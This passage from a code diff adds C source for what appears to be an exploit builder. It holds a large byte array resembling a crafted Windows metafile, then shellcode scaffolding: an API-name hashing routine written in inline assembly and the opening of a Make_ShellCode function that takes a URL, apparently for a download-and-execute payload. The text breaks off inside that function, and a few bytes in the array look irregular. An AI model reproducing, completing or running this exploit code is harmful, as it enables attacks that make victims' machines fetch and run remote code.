+	0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00,
+	0x2B, 0x00, 0x00, 0x00, 0x32, 0x0A, 0xAC, 0x01, 0x75, 0x02, 0x18, 0x00, 0x00, 0x00, 0x65, 0x65,
+	0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
+	0x65, 0x65, 0x65, 0x65, 0x65, 0x20, 0x0B, 0x00, 0x08, 0x00, 0x08, 0x00, 0x0B, 0x00, 0x0A, 0x00,
+	0x05, 0x00, 0x0B, 0x00, 0x07, 0x00, 0x0A, 0x00, 0x0B, 0x00, 0x06, 0x00, 0x0B, 0x00, 0x0A, 0x00,
+	0x0B, 0x00, 0x07, 0x00, 0x0C, 0x00, 0x05, 0x00, 0x0B, 0x00, 0x0C, 0x00, 0x11, 0x00, 0x0C, 0x00,
+	0x05, 0x00, 0x0C, 0x00, 0x06, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00,
+	0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02,
+	0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01,
+	0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x13, 0x00, 0x00, 0x00, 0x32, 0x0A,
+	0xC6, 0x01, 0xD2, 0x01, 0x08, 0x00, 0x00, 0x00, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x20,
+	0x0C, 0x00, 0x08, 0x00, 0x0B, 0x00, 0x07, 0x00, 0x0B, 0x00, 0x05, 0x00, 0x0C, 0x00, 0x05, 0x00,
+	0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00,
+	0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x1E, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02,
+	0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00,
+	0x02, 0x01, 0x01, 0x00, 0x18, 0x00, 0x00, 0x00, 0x32, 0x0A, 0xDF, 0x01, 0xD2, 0x01, 0x0B, 0x00,
+	0x00, 0x00, 0x54, 0x52, 0x41, 0x46, 0x20, 0x3D, 0x20, 0x65, 0x65, 0x65, 0x65, 0x00, 0x0D, 0x00,
+	0x10, 0x00, 0x0F, 0x00, 0x0E, 0x00, 0x05, 0x00, 0x0C, 0x00, 0x06, 0x00, 0x0D, 0x00, 0x0F, 0x00,
+	0x0E, 0x00, 0x0F, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00,
+	0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00,
+	0x00, 0xAC, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00,
+	0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x09, 0xD2, 0x00, 0x00, 0x94, 0x0A, 0xDF, 0x01,
+	0x5C, 0x02, 0x01, 0x00, 0x00, 0x00, 0x2D, 0x00, 0x07, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01,
+	0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02,
+	0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00,
+	0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x22, 0x00,
+	0x00, 0x00, 0x32, 0x0A, 0xDF, 0x01, 0x63, 0x02, 0x12, 0x00, 0x00, 0x00, 0x65, 0x65, 0x65, 0x65,
+	0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x20, 0x0B, 0x00,
+	0x08, 0x00, 0x08, 0x00, 0x0B, 0x00, 0x0A, 0x00, 0x05, 0x00, 0x0B, 0x00, 0x07, 0x00, 0x0A, 0x00,
+	0x0C, 0x00, 0x05, 0x00, 0x07, 0x00, 0x0B, 0x00, 0x0A, 0x00, 0x07, 0x00, 0x0B, 0x00, 0x09, 0x00,
+	0x05, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01,
+	0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00,
+	0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00,
+	0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x18, 0x00, 0x00, 0x00, 0x32, 0x0A, 0xF9, 0x01, 0xD2, 0x01,
+	0x0B, 0x00, 0x00, 0x00, 0x54, 0x52, 0x41, 0x49, 0x4C, 0x20, 0x3D, 0x20, 0x54, 0x4E, 0x46, 0x00,
+	0x0D, 0x00, 0x10, 0x00, 0x10, 0x00, 0x07, 0x00, 0x0F, 0x00, 0x05, 0x00, 0x0C, 0x00, 0x06, 0x00,
+	0x73, 0x00, 0x0F, 0x00, 0x0E, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00,
+	0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02,
+	0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01,
+	0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x09, 0x00, 0x00, 0x00, 0xA7, 0x0A,
+	0xF9, 0x01, 0x57, 0x02, 0x01, 0x00, 0x00, 0x00, 0x2D, 0x00, 0x07, 0x00, 0x04, 0x00, 0x00, 0x00,
+	0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00,
+	0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00,
+	0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00,
+	0x21, 0x00, 0x00, 0x00, 0x32, 0x0A, 0xF9, 0x01, 0x5E, 0x02, 0x11, 0x00, 0x00, 0x00, 0x65, 0x65,
+	0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x00,
+	0x08, 0x00, 0x0B, 0x00, 0x05, 0x00, 0x0B, 0x00, 0x07, 0x00, 0x0A, 0x00, 0x0B, 0x00, 0x05, 0x00,
+	0x0C, 0x00, 0x0B, 0x00, 0x0B, 0x00, 0x0B, 0x00, 0x07, 0x00, 0x0B, 0x00, 0x09, 0x00, 0x06, 0x00,
+	0x08, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01,
+	0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x09, 0x00, 0x00,
+	0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00,
+	0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x09, 0x00, 0x00, 0x00, 0x32, 0x0A, 0xF9, 0x01, 0xF8, 0x02,
+	0x01, 0x00, 0x00, 0x00, 0x2D, 0x00, 0x08, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00,
+	0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF,
+	0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00,
+	0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x13, 0x00, 0x00, 0x00,
+	0x32, 0x0A, 0xF9, 0x01, 0x00, 0x03, 0x08, 0x00, 0x00, 0x00, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
+	0x65, 0x65, 0x06, 0x00, 0x0C, 0x00, 0x0B, 0x00, 0x0B, 0x00, 0x0B, 0x00, 0x06, 0x00, 0x0B, 0x00,
+	0x0B, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01,
+	0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00,
+	0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00,
+	0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x10, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x13, 0x02, 0xD2, 0x01,
+	0x06, 0x00, 0x00, 0x00, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x06, 0x00, 0x05, 0x00, 0x0B, 0x00,
+	0x0B, 0x00, 0x0C, 0x00, 0x0B, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00,
+	0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02,
+	0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01,
+	0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0xAD, 0x00, 0x00, 0x00, 0x32, 0x0A,
+	0x2C, 0x02, 0xD2, 0x01, 0x07, 0x00, 0x00, 0x00, 0x65, 0x65, 0x65, 0x65, 0x65, 0x20, 0x3D, 0x00,
+	0x0D, 0x00, 0x10, 0x00, 0x0F, 0x00, 0x0E, 0x00, 0x0E, 0x00, 0x06, 0x00, 0x0C, 0x00, 0x04, 0x00,
+	0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00,
+	0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00,
+	0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0xD8, 0x02, 0x01,
+	0x01, 0x00, 0x0C, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x2C, 0x02, 0x32, 0x02, 0x03, 0x00, 0x00, 0x00,
+	0x54, 0x64, 0x54, 0x00, 0x0E, 0x00, 0x0C, 0x00, 0x0D, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01,
+	0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02,
+	0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0xA4, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00,
+	0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x09, 0x00,
+	0x00, 0x00, 0x32, 0x0A, 0x2C, 0x02, 0x59, 0x02, 0x01, 0x7D, 0x00, 0x00, 0x2D, 0x00, 0x08, 0x00,
+	0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0xBA, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00,
+	0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02,
+	0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00,
+	0x02, 0x01, 0x01, 0x00, 0x13, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x2C, 0x02, 0x61, 0x02, 0x08, 0x00,
+	0x00, 0x00, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x11, 0x00, 0x0A, 0x00, 0x0C, 0x00,
+	0x05, 0x00, 0x0B, 0x00, 0x07, 0x00, 0x0B, 0x00, 0x0B, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01,
+	0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02,
+	0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00,
+	0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x0D, 0x00,
+	0x00, 0x00, 0x32, 0x0A, 0x2C, 0x02, 0xBB, 0x02, 0x04, 0x00, 0x00, 0x00, 0x65, 0x65, 0x65, 0x65,
+	0x0B, 0x00, 0x10, 0x00, 0x0D, 0x00, 0x0E, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00,
+	0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF,
+	0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00,
+	0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x13, 0x00, 0x00, 0x00,
+	0x32, 0x0A, 0x2C, 0x02, 0xF6, 0x02, 0x08, 0x00, 0x00, 0x00, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
+	0x65, 0x65, 0x0C, 0x00, 0x05, 0x00, 0x0B, 0x00, 0x0B, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x0C, 0x00,
+	0x0B, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01,
+	0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00,
+	0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00,
+	0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x09, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x2C, 0x02, 0x43, 0x03,
+	0x01, 0x00, 0x00, 0x00, 0x2D, 0x00, 0x08, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00,
+	0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF,
+	0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00,
+	0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x15, 0x00, 0x00, 0x00,
+	0x32, 0x0A, 0x46, 0x02, 0xD2, 0x01, 0x09, 0x00, 0x00, 0x00, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
+	0x65, 0x65, 0x20, 0x00, 0x05, 0x00, 0x0B, 0x00, 0x0B, 0x00, 0x0B, 0x00, 0x06, 0x00, 0x06, 0x00,
+	0x0B, 0x00, 0x0B, 0x00, 0x05, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00,
+	0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02,
+	0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01,
+	0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x0D, 0x00, 0x00, 0x00, 0x32, 0x0A,
+	0x60, 0x02, 0xD2, 0x01, 0x04, 0x00, 0x00, 0x00, 0x7A, 0x56, 0x41, 0x44, 0x09, 0x00, 0x0F, 0x00,
+	0x0F, 0x00, 0x10, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00,
+	0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00,
+	0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00,
+	0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x09, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x60, 0x02,
+	0x09, 0x02, 0x01, 0x00, 0x00, 0x00, 0x2E, 0x00, 0x05, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01,
+	0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02,
+	0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00,
+	0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x0C, 0x3F,
+	0x00, 0x00, 0x32, 0x0A, 0x60, 0x02, 0x0E, 0x02, 0x03, 0x00, 0x00, 0x00, 0x65, 0x65, 0x65, 0x00,
+	0x08, 0x00, 0x12, 0x00, 0x0B, 0x00, 0x04, 0x00, 0x30, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00,
+	0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02,
+	0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01,
+	0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x09, 0x00, 0x00, 0x00, 0x32, 0x0A,
+	0x60, 0x02, 0x38, 0x02, 0x01, 0x00, 0x00, 0x00, 0x3D, 0x00, 0x0C, 0x00, 0x04, 0x00, 0x00, 0x00,
+	0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00,
+	0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00,
+	0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00,
+	0x21, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x60, 0x02, 0x4A, 0x02, 0x11, 0x00, 0x00, 0x00, 0x65, 0x65,
+	0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x00,
+	0x0B, 0x00, 0x0B, 0x00, 0x0B, 0xAF, 0x0A, 0x00, 0x0B, 0x00, 0x05, 0x00, 0x0B, 0x00, 0x0B, 0x00,
+	0x0A, 0x00, 0x0A, 0x00, 0x0B, 0x00, 0x09, 0x00, 0x0B, 0x00, 0x0C, 0x00, 0x0B, 0x00, 0x0B, 0x00,
+	0x06, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01,
+	0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0xDD,
+	0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00,
+	0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x09, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x60, 0x02, 0xF6, 0x02,
+	0x01, 0x00, 0x00, 0x00, 0x2D, 0x00, 0x07, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00,
+	0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF,
+	0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00,
+	0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x10, 0x00, 0x00, 0x00,
+	0x32, 0x0A, 0x60, 0xEB, 0xFD, 0x02, 0x06, 0x00, 0x00, 0x00, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
+	0x0B, 0x00, 0x0B, 0x00, 0x06, 0x00, 0x06, 0x00, 0x0B, 0x00, 0x0A, 0x00, 0x04, 0x00, 0x00, 0x00,
+	0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00,
+	0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00,
+	0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00,
+	0x09, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x60, 0x02, 0x34, 0x03, 0x01, 0x00, 0x00, 0x00, 0x2D, 0x00,
+	0x07, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01,
+	0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00,
+	0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00,
+	0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x12, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x60, 0x02, 0x3B, 0x03,
+	0x07, 0x00, 0x00, 0x00, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x00, 0x0B, 0x00, 0x05, 0x00,
+	0x0C, 0x00, 0x0C, 0x4F, 0x05, 0x00, 0x0B, 0x00, 0x0A, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01,
+	0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02,
+	0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00,
+	0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x09, 0x00,
+	0x00, 0x00, 0x32, 0x0A, 0x60, 0x02, 0x7D, 0x03, 0x01, 0x00, 0x00, 0x00, 0x2D, 0x00, 0x08, 0x00,
+	0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00,
+	0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02,
+	0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0xF7, 0x62, 0x00,
+	0x02, 0x01, 0x01, 0x00, 0x31, 0x00, 0x00, 0xC3, 0x32, 0x0A, 0x79, 0x02, 0xD2, 0x01, 0x1C, 0x00,
+	0x00, 0x00, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
+	0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x0B, 0x00,
+	0x08, 0x00, 0x0B, 0x00, 0x0C, 0x00, 0x08, 0x00, 0x07, 0x00, 0x0B, 0x00, 0x07, 0x00, 0x0A, 0x00,
+	0x05, 0x00, 0x08, 0x00, 0x06, 0x00, 0x0B, 0x00, 0x0C, 0x00, 0x08, 0x00, 0x0B, 0x00, 0x11, 0x00,
+	0x0A, 0x00, 0x08, 0x00, 0x0C, 0x00, 0x0B, 0x00, 0x05, 0x00, 0x0B, 0x00, 0x0A, 0x00, 0x07, 0x00,
+	0x0C, 0x00, 0x0B, 0x00, 0x0A, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00,
+	0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x04, 0x00,
+	0x00, 0x00, 0x2D, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2D, 0x01, 0x04, 0x00, 0x10, 0x00,
+	0x00, 0x00, 0xFB, 0x02, 0x10, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0xBC, 0x02, 0x00, 0x00,
+	0x00, 0xEE, 0x01, 0x02, 0x02, 0x22, 0x53, 0x79, 0x73, 0x74, 0x65, 0x6D, 0x00, 0xEE, 0x04, 0x00,
+	0x00, 0x00, 0x2D, 0x01, 0x05, 0x00, 0x04, 0x00, 0x00, 0x00, 0xF0, 0x01, 0x03, 0x00, 0x0F, 0x00,
+	0x00, 0x00, 0x26, 0x06, 0x0F, 0x00, 0x14, 0x00, 0x54, 0x4E, 0x50, 0x50, 0x04, 0x00, 0x0C, 0x00,
+	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x09, 0x00, 0x00, 0x00,
+	0x26, 0x06, 0x0F, 0x00, 0x08, 0x00, 0xFF, 0xFF, 0xFF, 0xFF, 0x01, 0x00, 0x00, 0x00, 0x03, 0x00,
+	0x00, 0x00, 0x00, 0x00
+};
+
+
+// Shellcode string
+unsigned char  sc[1024] = {0};
+unsigned int   Sc_len;
+
+// ASM shellcode main function
+void    ShellCode();
+
+// Get function hash
+static DWORD __stdcall GetHash ( char *c )
+{
+   DWORD h = 0;
+
+   while ( *c )
+   {
+       __asm ror h, HASH_KEY
+
+       h += *c++;
+   }
+   return( h );
+}
+
+void Make_ShellCode(char *url1)
+{
+   unsigned char  *pSc_addr;
+   unsigned int   Enc_key=ENC_KEY;
+   unsigned long  dwHash[100];
+   unsigned int   dwHashSize;
+   int i,j,k,l;
+
+
+   // Get functions hash
+   //printf("[+] Get functions hash strings.\r\n");
+   for (i=0;;i++)
+   {
+       if (functions[i][0] == '\x0') break;
+
+       dwHash[i] = GetHash((char*)functions[i]);
+       //printf("\t%.8X\t%s\n", dwHash[i], functions[i]);
+   }
+   dwHashSize = i*4;
+
+
+   // Deal with shellcode
+   pSc_addr = (unsigned char *)ShellCode;
